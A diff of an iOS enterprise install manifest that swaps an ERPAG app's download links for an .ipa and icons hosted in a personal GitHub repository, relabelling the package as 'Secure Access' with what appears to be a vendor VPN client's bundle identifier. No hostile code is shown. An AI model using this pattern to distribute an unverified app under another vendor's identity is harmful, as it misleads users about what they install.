--- a/CloudFlareBuild/Manifest.plist
+++ b/CloudFlareBuild/Manifest.plist
@@ -9,31 +9,31 @@
 <key>kind</key>
 <string>software-package</string>
 <key>url</key>
-<string>https://app.erpag.com/install/ERPAG_Enterprise_1_09.ipa</string>
+<string>https://github.com/amitkhoth/ivantiTest/raw/refs/heads/main/CloudFlareBuild/Secure%20Access.ipa</string>
 </dict>
 <dict>
 <key>kind</key>
 <string>display-image</string>
 <key>url</key>
-<string>https://app.erpag.com/install/Logo57.png</string>
+<string>https://github.com/amitkhoth/ivantiTest/blob/main/CloudFlareBuild/App%20Icon%20(iPhone%20Settings)%2058%20x%2058%20(2x).png</string>
 </dict>
 <dict>
 <key>kind</key>
 <string>full-size-image</string>
 <key>url</key>
-<string>https://app.erpag.com/install/Logo512.png</string>
+<string>https://github.com/amitkhoth/ivantiTest/blob/main/CloudFlareBuild/App%20Icon%20(App%20Store)%201024%20x%201024%20(1x).png</string>
 </dict>
 </array>
 <key>metadata</key>
 <dict>
 <key>bundle-identifier</key>
-<string>com.erpag</string>
+<string>net.pulsesecure.pulsesecure</string>
 <key>bundle-version</key>
-<string>1.09</string>
+<string>22.8.2.94913</string>
 <key>kind</key>
 <string>software</string>
 <key>title</key>
-<string>ERPAG App</string>
+<string>Secure Access</string>
 </dict>
 </dict>
 </array>
